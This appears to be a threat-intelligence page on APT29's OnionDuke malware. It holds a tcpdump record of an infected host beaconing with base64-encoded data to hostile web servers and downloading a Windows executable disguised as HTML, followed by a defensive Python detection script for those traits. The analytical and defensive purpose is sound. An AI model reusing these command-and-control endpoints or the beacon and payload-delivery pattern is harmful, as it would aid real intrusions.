OnionDuke APT Malware Traffic Sample PCAP Download



OnionDuke

OnionDuke is malware that was used by APT29 from 2013 to 2015.

APT29 is a threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).[1][2] They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. APT29 reportedly compromised the Democratic National Committee starting in the summer of 2015.[3][4][5][6]

In April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR; public statements included citations to APT29, Cozy Bear, and The Dukes.[7][8] Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, and Dark Halo.

Packet capture summary (tcpdump output):

1970-01-01 -4:-58:-32.468345 IP 10.0.2.15.1025 > 10.0.2.2.53: 56315+ A? rombeast.site50.net. (37)
1970-01-01 -4:-58:-32.492920 IP 10.0.2.2.53 > 10.0.2.15.1025: 56315 1/2/0 A 31.170.162.243 (103)
[authority records in the reply: ns1 and ns2 under 000webhost.com]
1970-01-01 -4:-58:-32.496438 IP 10.0.2.15.1048 > 31.170.162.243.80: Flags [S], seq 3752956870, win 64240, options [mss 1460,nop,nop,sackOK], length 0
1970-01-01 -4:-58:-32.595297 IP 31.170.162.243.80 > 10.0.2.15.1048: Flags [S.], seq 64001, ack 3752956871, win 65535, options [mss 1460], length 0
1970-01-01 -4:-58:-32.595497 IP 10.0.2.15.1048 > 31.170.162.243.80: Flags [.], ack 1, win 64240, length 0
1970-01-01 -4:-58:-32.595729 IP 10.0.2.15.1048 > 31.170.162.243.80: Flags [P.], seq 1:289, ack 1, win 64240, length 288: HTTP: GET /forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPyQiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfok/IZeMI3Q6kTfIGpxKNH69dygatW6dP40DCHLd3xAv5CJxX8hGVW/QZnVg= HTTP/1.1
GET /forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPyQiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfok/IZeMI3Q6kTfIGpxKNH69dygatW6dP40DCHLd3xAv5CJxX8hGVW/QZnVg= HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rombeast.site50.net
Cache-Control: no-cache

1970-01-01 -4:-58:-32.595780 IP 31.170.162.243.80 > 10.0.2.15.1048: Flags [.], ack 289, win 65535, length 0
1970-01-01 -4:-58:-32.866662 IP 31.170.162.243.80 > 10.0.2.15.1048: Flags [P.], seq 1:1408, ack 289, win 65535, length 1407: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Wed, 18 Dec 2013 03:49:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Length: 1243
Connection: close
Content-Type: text/html

1970-01-01 -4:-58:-32.875339 IP 10.0.2.15.1025 > 10.0.2.2.53: 6529+ A? www.226ers.es. (31)
1970-01-01 -4:-58:-31.093371 IP 10.0.2.2.53 > 10.0.2.15.1025: 6529 1/3/0 A 208.113.199.191 (114)
[authority records in the reply: ns1, ns2 and ns3 under dreamhost.com]
1970-01-01 -4:-58:-31.093919 IP 10.0.2.15.1049 > 208.113.199.191.80: Flags [S], seq 1505536384, win 64240, options [mss 1460,nop,nop,sackOK], length 0
1970-01-01 -4:-58:-31.181729 IP 208.113.199.191.80 > 10.0.2.15.1049: Flags [S.], seq 192001, ack 1505536385, win 65535, options [mss 1460], length 0
1970-01-01 -4:-58:-31.184827 IP 10.0.2.15.1049 > 208.113.199.191.80: Flags [.], ack 1, win 64240, length 0
1970-01-01 -4:-58:-31.185054 IP 10.0.2.15.1049 > 208.113.199.191.80: Flags [P.], seq 1:147, ack 1, win 64240, length 146: HTTP: GET /sysinfo_7.php HTTP/1.1
GET /sysinfo_7.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.226ers.es
Cache-Control: no-cache

1970-01-01 -4:-58:-31.185134 IP 208.113.199.191.80 > 10.0.2.15.1049: Flags [.], ack 147, win 65535, length 0
1970-01-01 -4:-58:-31.274162 IP 208.113.199.191.80 > 10.0.2.15.1049: Flags [P.], seq 1:533, ack 147, win 65535, length 532: HTTP: HTTP/1.1 503 Service Temporarily Unavailable
HTTP/1.1 503 Service Temporarily Unavailable
Date: Wed, 18 Dec 2013 03:52:32 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

503 Service Temporarily Unavailable

Service Temporarily Unavailable

The server is temporarily unable to service your
request due to maintenance downtime or capacity
problems. Please try again later.

1970-01-01 -4:-58:-31.400301 IP 10.0.2.15.1050 > 31.170.162.243.80: Flags [P.], seq 1:163, ack 1, win 64240, length 162: HTTP: GET /forum/phpBB3/prx_26.php HTTP/1.1
GET /forum/phpBB3/prx_26.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rombeast.site50.net
Cache-Control: no-cache

1970-01-01 -4:-58:-31.400374 IP 31.170.162.243.80 > 10.0.2.15.1050: Flags [.], ack 163, win 65535, length 0
1970-01-01 -4:-58:-31.610731 IP 31.170.162.243.80 > 10.0.2.15.1050: Flags [P.], seq 1:171, ack 163, win 65535, length 170: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Wed, 18 Dec 2013 03:49:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

1970-01-01 -4:-58:-31.610731 IP 31.170.162.243.80 > 10.0.2.15.1050: Flags [.], seq 171:1591, ack 163, win 65535, length 1420: HTTP
27400
[binary chunk body: a PE executable starting with the MZ header and the "This program cannot be run in DOS mode" stub, with .text, .rdata, .data and .reloc sections]
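A defender's triage check written for this page (an added example, not part of the original capture or of any OnionDuke tooling): it parses an HTTP request in the form shown in the dump above and reports which of the capture's traits it carries: the IE6 User-Agent paired with Cache-Control: no-cache, a query parameter holding opaque base64, and a response whose body begins with an MZ header despite a text/html Content-Type. The menu.php request is copied from the capture; the response body bytes and the indicator names are constructed for the example.

```python
import re
import base64
# Request header pair seen on both C2 requests in the capture above.
SUSPECT_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
# Sample transaction: the menu.php request copied from the capture above, plus a
# constructed stand-in for the start of the chunked prx_26.php response body.
MENU_REQUEST = (
    "GET /forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPyQiNG6pFyBy3ScAf+QicXPsfnlz7"
    "HZRZyQiNBqcSjR2mSckfok/IZeMI3Q6kTfIGpxKNH69dygatW6dP40DCHLd3xAv5CJxX8hGVW/"
    "QZnVg= HTTP/1.1\r\nUser-Agent: " + SUSPECT_UA + "\r\n"
    "Host: rombeast.site50.net\r\nCache-Control: no-cache\r\n"
)
PRX_RESPONSE_BODY = b"27400\r\nMZ\x90\x00\x03\x00\x00\x00"  # constructed PE stub

def parse_request(raw):
    """Return (request-target, lower-cased header dict) of a raw HTTP request."""
    request_line, *header_lines = raw.strip().splitlines()
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return request_line.split(" ")[1], headers

def opaque_base64(value):
    """True if value is well-formed base64 that decodes to mostly non-text bytes."""
    if len(value) < 32 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return False
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return sum(32 <= b < 127 for b in raw) / len(raw) < 0.8

def flag_transaction(request, resp_content_type="", resp_body=b""):
    """Return the names of the capture's indicators this HTTP exchange matches."""
    target, headers = parse_request(request)
    hits = []
    if headers.get("user-agent") == SUSPECT_UA and headers.get("cache-control") == "no-cache":
        hits.append("ie6-ua-with-no-cache")
    # Split the query by hand: parse_qsl would turn the raw '+' (part of the base64) into a space.
    for pair in target.partition("?")[2].split("&"):
        if opaque_base64(pair.partition("=")[2]):
            hits.append("opaque-base64-query-param")
            break
    # A PE image (MZ) declared as text/html; strip a leading chunk-size line first.
    payload = re.sub(rb"\A[0-9a-fA-F]+\r?\n", b"", resp_body, count=1)
    if resp_content_type.startswith("text/html") and payload.startswith(b"MZ"):
        hits.append("pe-served-as-text-html")
    return hits
```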
